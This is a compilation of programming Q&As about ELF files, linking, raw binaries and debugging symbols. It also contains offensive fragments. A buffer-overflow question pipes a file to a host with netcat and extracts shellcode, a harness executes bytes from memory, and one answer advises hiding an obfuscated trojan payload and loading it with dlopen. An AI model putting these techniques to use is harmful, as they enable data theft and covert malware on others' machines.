ELF binary from memory - C

I just wrote a Hello world program in C that I was playing around with. I'd like to try to dump the binary from memory (using gdb) and create another executable from it. I tried dumping the page with executable privileges followed by its data page; however, the result segfaults. Are there any approaches to doing this? Is there any way I can debug and find out why it crashes? Any generic suggestions at all?
Thanks.
[EDIT]
It's on Linux, and I've tried it on both 32-bit and 64-bit x86. The kernel version is 3.13. I set a breakpoint on _start, dumped the executable page followed by its data page to a file and tried executing it.

Wait, are you just dumping the mapped text (executable page) section followed by the mapped data section to a file? That by itself wouldn't be a valid ELF object; an ELF file needs an ELF header as well. I am surprised the OS even let you attempt to execute that; you should have gotten an error about an invalid ELF header or something like that.
In addition to the header, an ELF file contains many more sections that are needed in order to run it.
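To make the header point concrete, here is a minimal sketch (my own illustration, not from the original question) that checks whether a file starts with a valid ELF header, using the definitions from <elf.h>. A raw dump of the text and data pages will fail this check unless it happens to begin with the right magic bytes; the entry-point print assumes a 64-bit ELF.

#include <elf.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    Elf64_Ehdr eh;
    if (!f || fread(&eh, sizeof eh, 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0) {
        puts("no valid ELF header - the kernel would refuse to execve() this file");
        return 1;
    }
    /* e_entry, e_phoff etc. are what the kernel and dynamic linker need to map and start it */
    printf("ELF header found, entry point 0x%lx\n", (unsigned long)eh.e_entry);
    return 0;
}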
As for debugging, I'd start with GDB to see where it crashes. Does your program crash, or does the dynamic linker crash when trying to load your program? If the dynamic linker crashes, try debugging that, e.g. with
gdb --args /lib64/ld-2.18.so <your program>
Attempts to re-create ELF files from memory have been done before - have a look at Statifier, which even statically includes all loaded dynamic libraries into the resulting ELF.

It might not be very simple, and it is certainly processor and operating system specific.
You could look at the Emacs source file unexec.c, which does what you want. See this answer

Related

How to compile a library for a fixed address in microblaze

I want to build a library which is relocatable (i.e. it uses nothing other than local variables). I also want to force the library to be at a fixed location in memory. I think this has to be done in the makefile, but I am confused as to what I have to do to force the library to be loaded at a fixed location. This is using mb-gcc.
The reason I need this is that I want to write a loader where I don't want to clobber the code that is actually doing the copy of the other program. So I want the program that is doing the copying to be located somewhere else, at a location that is not being used (i.e. DDR).
If I have all the functions that do the copying compiled into a library, what special makefile arguments do I need to force this to be loaded at location 0x80000000, for example?
Any help would be greatly appreciated. Thanks in advance.
You write a linker script, and tell the compiler/linker to use it by using the -T script.ld option (to gcc and/or ld, depending on how you build your firmware files).
In your library C source files, you can use the __attribute__((section ("name"))) syntax to put your functions and variables into a specific section. The linker script can then decide where to put each section -- often at a fixed address for these kinds of devices. (You'll often see macro declarations like #define FIRMWARE __attribute__((section(".text.firmware"))) or similar, to make the code easier to read and understand.)
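As a rough sketch of that attribute/macro approach (the section name .text.firmware and the copy routine below are made up for illustration; they have to match whatever output section your linker script places at the fixed address):

/* Keep the routine self-contained: only arguments and locals, no globals,
   so it stays relocatable as described in the question. */
#define FIRMWARE __attribute__((section(".text.firmware")))

FIRMWARE void copy_image(volatile unsigned int *dst,
                         const unsigned int *src,
                         unsigned int words)
{
    while (words--)
        *dst++ = *src++;
}

The linker script then places the .text.firmware output section at the address you want (e.g. 0x80000000), so the copy routine never overlaps the image it is copying.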
If you create a separate firmware file just for your library, then you don't need to add the attributes to your code; just write the linker script to put the .text (executable code), .rodata (read-only constants), .data (initialized variables), and .bss (uninitialized variables) sections at suitable addresses.
A web search for microblaze "linker script" finds some useful examples, and even more guides. Some of them must be suitable for your tools.

How do you convert C code into assembly's hex representation?

Edit: It appears I have a lot more reading to do...
Also, for those telling me this is a bad idea, it's for a buffer overflow exercise.
I have a fairly simple C program:
#include <stdlib.h>   /* for system() */

int main() {
    system("cat file | nc -p 33 localhost 8080");
    return 0;
}
I want to turn it into hex assembly code. Think something like:
\x55\x43\xff\x75\x13\x77...
I tried doing:
gcc -o shell shell.c
for i in $(objdump -d shell -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
And that gave me a nice long string of hex. But when I tested it in this program, I got a segfault.
char code[] = "\x55\x43\xff\x75\x13\x77...";

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (int)(*func)();
}
Anyone know how I can get this working? Thanks! Also, I don't know if it matters, but it's a 64-bit system.
You are missing a whole bunch of stuff that the OS does for you between the time the binary code is loaded from disk and the time it is executed. Take the call system(char *command), for example: the pointer to the command characters is invalid until the OS loader "fixes up" the pointers.
If you are very, very careful you can construct code that does not rely on pointers and can run from any arbitrary address without help from the OS loader. This is how stack overflow exploits are created. Most modern CPUs prevent this code from running by using the memory manager to mark memory as either "DATA" or "CODE" and faulting if your program tries to execute DATA or write to CODE.
What you are trying to do, the OS is trying to prevent.
This won't work. The main reason is: what your compiler creates for you is not just plain binary code but a well-defined file format for a runnable program (on Windows a PE file, on Linux an ELF file). This file is read by the dynamic linker of your operating system and preprocessed (e.g. linked against dynamic shared objects, read: libraries) before it is executed by jumping to the entry point given in the headers of the file. There's no way such a file could be executed by just jumping to its first byte. In fact, it's the linker that creates the output format, but it's invoked by the compiler automatically.
If you JUST want the assembler code, use gcc -S ... you will get mnemonics that could be fed to a standalone assembler.
There are ways to trick the linker into emitting a plain binary of your code (see here an interesting read about how to use that to generate an MS-DOS .COM file), but you still have the problem that your program typically doesn't consist only of the text (read: the binary code that is executed); you also have data, typically in the .rodata segment (read-only constants) and the .data/.bss segments (read-write variables).
Adding to that, placing the binary in a C string will normally put it in one of those data segments. Although that memory could be executable, it doesn't have to be, and from a security point of view it shouldn't be -- see Data Execution Prevention.
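For completeness, here is a minimal sketch (mine, not the answerer's) of what you would have to do to run bytes from a C program on a system with DEP/NX enabled: copy them into memory you explicitly mapped as executable. The byte below is just a placeholder (a single x86 ret), not real shellcode, and some hardened systems refuse writable-and-executable mappings altogether.

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

static const unsigned char code[] = { 0xc3 };   /* placeholder: x86 "ret" */

int main(void)
{
    /* ask for a page that is readable, writable and executable */
    void *buf = mmap(NULL, sizeof code, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) { perror("mmap"); return 1; }
    memcpy(buf, code, sizeof code);
    ((void (*)(void))buf)();    /* jump to the copied bytes */
    puts("returned from injected code");
    return 0;
}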
All in all, just forget about that...
I'm not sure what you are trying to achieve, but if I put my black hat on for a minute...
If you are trying to write a stack overflow exploit, you need to learn about the memory manager and the gory details of the target CPU. You will be dealing strictly with the CPU and circumventing the OS entirely.
If you are trying to write a trojan horse, you should compile your payload as a dynamic library (.so) and put the hex for the entire payload.so file into code[]. Then, in the carrier program, map code[] to a virtual file (or just write it to disk) and call dlopen() on the (virtual) file (dlopen() being the Linux counterpart of LoadLibrary()). You still won't be root, but your payload will be buried inside the first executable. You can bit-twiddle the code[] bytes to obfuscate the payload. You may also need to figure out the right permissions for the newly created file.
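A minimal, hedged sketch of just the dlopen()/dlsym() step described above (the symbol name payload_entry is hypothetical, and writing code[] out to the file beforehand is left out):

#include <dlfcn.h>
#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <payload.so>\n", argv[0]); return 1; }

    void *handle = dlopen(argv[1], RTLD_NOW);            /* load the shared object */
    if (!handle) { fprintf(stderr, "dlopen: %s\n", dlerror()); return 1; }

    void (*entry)(void) = (void (*)(void))dlsym(handle, "payload_entry");
    if (!entry) { fprintf(stderr, "dlsym: %s\n", dlerror()); return 1; }

    entry();                                             /* run the payload's entry point */
    dlclose(handle);
    return 0;
}

Link with -ldl on older glibc (since glibc 2.34 the dl functions live in libc itself).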
For either of these, you will be working against the CPU and/or OS.

What's the difference between binary and executable files mentioned in ndisasm's manual?

I want to compile my C file with clang and then disassemble it with ndisasm (for educational purposes). However, ndisasm says in its manual that it only works with binary and not executable files:
ndisasm only disassembles binary files: it has
no understanding of the header information
present in object or executable files. If you
want to disassemble an object file, you should
probably be using objdump(1).
What's the difference, exactly? And what does clang output when I run it with a simple C file, an executable or a binary?
An object file contains machine language code and all sorts of other information. ndisasm wants just the machine code, not the other stuff, so the message is telling you to use the objdump utility, which does understand those headers, on object and executable files. Alternatively, you can extract just the machine code section(s) from the file (objcopy -O binary can do that) and then run ndisasm on the result.
And what does clang output when I run it with a simple C file, an executable or a binary?
A C compiler is usually able to create a 'raw' binary, which is Just The Code, hold the tomato, because for some (rare!) purposes that can be useful. Think, for instance, of boot sectors (which cannot 'load' an executable the regular way because the OS that would load them is not yet started) and of programmable RAM chips. An operating system in itself usually does not like to execute 'raw binary code' - pretty much for the same reasons. An exception is MS Windows, whose 32-bit versions can still run old-format .com binaries.
By default, clang will create an executable. The intermediate files, called object files, are usually deleted after the executable is linked (glued together with library functions and an appropriate executable header). To get just a .o object file, use the -c switch.
Note that object files also contain a header. After all, the linker needs to know what the file contains before it can link it to other parts.
For educational purposes, you may want to examine the object file format. Armed with that knowledge it should be possible to write a program that can tell you at what offset in the file the actual code starts. Then you can feed that information into ndisasm.
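For example, a rough sketch along those lines (assuming a 64-bit ELF and skipping most error handling): read the ELF and section headers via <elf.h> and print where .text sits in the file, which you can then pass to ndisasm with -e (and -b 64).

#include <elf.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 1; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror("fopen"); return 1; }

    Elf64_Ehdr eh;
    fread(&eh, sizeof eh, 1, f);                     /* ELF header */

    Elf64_Shdr *sh = malloc(eh.e_shnum * sizeof *sh);
    fseek(f, eh.e_shoff, SEEK_SET);
    fread(sh, sizeof *sh, eh.e_shnum, f);            /* section headers */

    char *names = malloc(sh[eh.e_shstrndx].sh_size);
    fseek(f, sh[eh.e_shstrndx].sh_offset, SEEK_SET);
    fread(names, 1, sh[eh.e_shstrndx].sh_size, f);   /* section name string table */

    for (int i = 0; i < eh.e_shnum; i++)
        if (strcmp(names + sh[i].sh_name, ".text") == 0)
            printf(".text starts at file offset 0x%lx, %lu bytes\n",
                   (unsigned long)sh[i].sh_offset, (unsigned long)sh[i].sh_size);
    fclose(f);
    return 0;
}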
In addition to the header, files may contain even more data after the instructions. Again, ndisasm does not know this, nor does it care. If your test program contains a string like Hello world! somewhere at the end, it will happily try to disassemble that as well. It's up to you to recognize this garbage as such and ignore what ndisasm does to it.

Getting stack offsets of variables from debugging symbols

When I build a program with debugging information (gcc -g), gdb is able to tell me addresses of local variables inside a function. Thus, the debugging symbols must contain enough information to calculate this (i.e. an offset from ebp), and since gdb uses libbfd to read debugging symbols, I should be able to as well.
However, libbfd's documentation seems to have nothing on this. Can libbfd give me this information?
libbfd will provide access to the ELF file: opening the file and getting at the contents of its sections. But interpreting those contents is not something that libbfd does; that is something the application would need to do.
Usually, debugging information is encoded using DWARF.
There are libraries for interpreting DWARF; however, gdb includes its own code for parsing it.
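To illustrate that division of labour, a hedged sketch of the libbfd side only (API details differ slightly between binutils versions, and you link with -lbfd): it pulls the raw .debug_info bytes out of the file, after which decoding the DWARF - e.g. turning DW_OP_fbreg location expressions into frame-base offsets - is up to you or a DWARF library such as libdwarf or libdw.

#define PACKAGE "bfd-sketch"          /* some distributions' bfd.h refuses to compile without these */
#define PACKAGE_VERSION "0"
#include <bfd.h>
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 1; }

    bfd_init();
    bfd *abfd = bfd_openr(argv[1], NULL);
    if (!abfd || !bfd_check_format(abfd, bfd_object)) {
        fprintf(stderr, "not an object file\n");
        return 1;
    }

    asection *sec = bfd_get_section_by_name(abfd, ".debug_info");
    if (!sec) { fprintf(stderr, "no .debug_info section\n"); return 1; }

    bfd_size_type size = bfd_section_size(sec);   /* bfd_get_section_size() on older binutils */
    unsigned char *buf = malloc(size);
    bfd_get_section_contents(abfd, sec, buf, 0, size);

    printf("%lu bytes of DWARF in .debug_info - decoding them is your job\n",
           (unsigned long)size);
    bfd_close(abfd);
    return 0;
}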

Usage differences between a.out, ELF, EXE, and COFF

Don't get me wrong by looking at the question title - I know what they are (formats for executable files). But the scope of my interest is slightly different.
MY CONFUSION
I am involved in re-hosting/retargeting applications that originally come from third parties. The problem is that sometimes the object code is also in ELF or COFF format and is still described as "executable and linkable".
I am primarily a Windows user and know that when you compile and assemble your C/C++ code, you get something like a .o or .obj file that is not executable (well, I never tried to execute one). But when you complete linking the static and dynamic libraries and finish building, the executable appears. My understanding is that you can then go about and run that executable, or test it with some form of bash script if necessary.
However, on Linux (or UNIX-like systems) there are .o files after you compile and assemble the C/C++ code. And once the linking is done, the executable is in a.out format (at least on the Ubuntu distribution of Linux). It may very well be .elf in some other distribution. In my quick web search, none of the sources mentioned anything about .o files as executables.
QUESTIONS
Therefore my question turns into the following:
What are the true definitions of portable executables and object code?
How is it that the Windows and UNIX platforms cover both executables and object code under the same file formats (COFF, ELF)?
Am I misinterpreting "Linkable"? My interpretation of "Linkable" is something that is compiled object code and can then be "linked" to other static/dynamic link libraries. Is this a stupid thought?
Based on question 1 (and perhaps 2), do I need to use symbol tables (e.g. .LUM or .MAP files) with object code then? Symbols as in debug symbols, used when re-hosting the executables/object files on a different machine.
Thanks in advance for the right nudges. Meanwhile, I will keep digging and update the question if necessary.
UPDATE
I have managed to dig this out from somewhere :( Seems like a lot to swallow to me.
I am primarily a Windows user and know that when you compile your C/C++ code, you get something like a .o or .obj file that is not executable
Well, last time I compiled stuff on Windows, the result of the compilation was an .obj file, which is exactly what its name suggests: it's an object file. You're right in that it's not an executable in itself. It contains machine code which doesn't (yet) contain enough information to be directly run on the CPU.
However, on Linux (or UNIX-like systems) there are .o files after you compile the C/C++ code. And once the linking is done, the executable is in a.out format (at least on the Ubuntu distribution of Linux). It may very well be .elf in some other distribution.
Living in the 90's, that is :P No modern compiler I am aware of targets the a.out format as its default output format. Maybe it's a misleading default of GCC to name the linked output a.out when no explicit output file name is specified, but if you run the file command on a.out, you'll find out that it's an ELF file. The a.out format is ancient and "de facto obsolete".
What are the true definitions of portable executables and object code?
You've already got the Wikipedia link to object files, here's the one to "Portable Executable".
How is it that the Windows and UNIX platforms cover both executables and object code under the same file formats (COFF, ELF)?
Because the ELF format (and apparently COFF too) was designed that way. And why not? It's the very same machine code after all; it seems quite logical to use one file format throughout all the compilation steps. Just as we don't like it when dynamic libraries and stand-alone executables have different formats. (That's why ELF is called ELF - it's an "Executable and Linkable Format".)
Am I misinterpreting "Linkable"?
I don't know. From your question it's not clear to me what you think "linkable" means. In general, it means a file that can be linked against, i.e. a library.
Based on question 1 (and perhaps 2), do I need to use symbol tables (e.g. .LUM or .MAP files) with object code then? Symbols as in debug symbols, used when re-hosting the object files on a different machine.
I think this one is not related to the executable format used. If you want to debug, you have to generate debugging information no matter what. But if you don't need to debug, then you're free to omit it, of course.
